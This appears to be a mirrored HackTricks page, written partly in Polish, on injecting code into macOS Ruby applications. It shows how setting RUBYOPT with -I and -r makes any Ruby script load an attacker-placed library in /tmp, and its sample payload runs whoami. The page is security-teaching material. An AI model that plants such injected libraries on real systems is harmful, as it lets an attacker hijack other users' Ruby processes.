mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-27 12:25:07 +00:00
60 lines
3.1 KiB
Markdown
60 lines
3.1 KiB
Markdown
|
# macOS Ruby Applications Injection
|
||
|
|
|
||
|
|
{% hint style="success" %}
|
||
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
|
||
|
|
<details>
|
||
|
|
|
||
|
|
<summary>Support HackTricks</summary>
|
||
|
|
|
||
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
|
||
|
|
</details>
|
||
|
|
{% endhint %}
|
||
|
|
|
||
|
|
## RUBYOPT
|
||
|
|
|
||
|
|
Używając tej zmiennej środowiskowej, można **dodać nowe parametry** do **ruby** za każdym razem, gdy jest uruchamiane. Chociaż parametr **`-e`** nie może być użyty do określenia kodu ruby do wykonania, możliwe jest użycie parametrów **`-I`** i **`-r`** do dodania nowego folderu do ścieżki ładowania bibliotek, a następnie **określenie biblioteki do załadowania**.
|
||
|
|
|
||
|
|
Utwórz bibliotekę **`inject.rb`** w **`/tmp`**:
|
||
|
|
|
||
|
|
{% code title="inject.rb" %}
|
||
|
|
```ruby
|
||
|
|
puts `whoami`
|
||
|
|
```
|
||
|
|
{% endcode %}
|
||
|
|
|
||
|
|
Utwórz gdziekolwiek skrypt ruby, taki jak:
|
||
|
|
|
||
|
|
{% code title="hello.rb" %}
|
||
|
|
```ruby
|
||
|
|
puts 'Hello, World!'
|
||
|
|
```
|
||
|
|
{% endcode %}
|
||
|
|
|
||
|
|
Następnie spraw, aby dowolny skrypt ruby załadował go za pomocą:
|
||
|
|
```bash
|
||
|
|
RUBYOPT="-I/tmp -rinject" ruby hello.rb
|
||
|
|
```
|
||
|
|
Fajny fakt, działa nawet z parametrem **`--disable-rubyopt`**:
|
||
|
|
```bash
|
||
|
|
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
|
||
|
|
```
|
||
|
|
{% hint style="success" %}
|
||
|
|
Ucz się i ćwicz Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
|
Ucz się i ćwicz Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
|
||
|
|
<details>
|
||
|
|
|
||
|
|
<summary>Wsparcie dla HackTricks</summary>
|
||
|
|
|
||
|
|
* Sprawdź [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)!
|
||
|
|
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegram**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
|
* **Dziel się trikami hackingowymi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na githubie.
|
||
|
|
|
||
|
|
</details>
|
||
|
|
{% endhint %}
|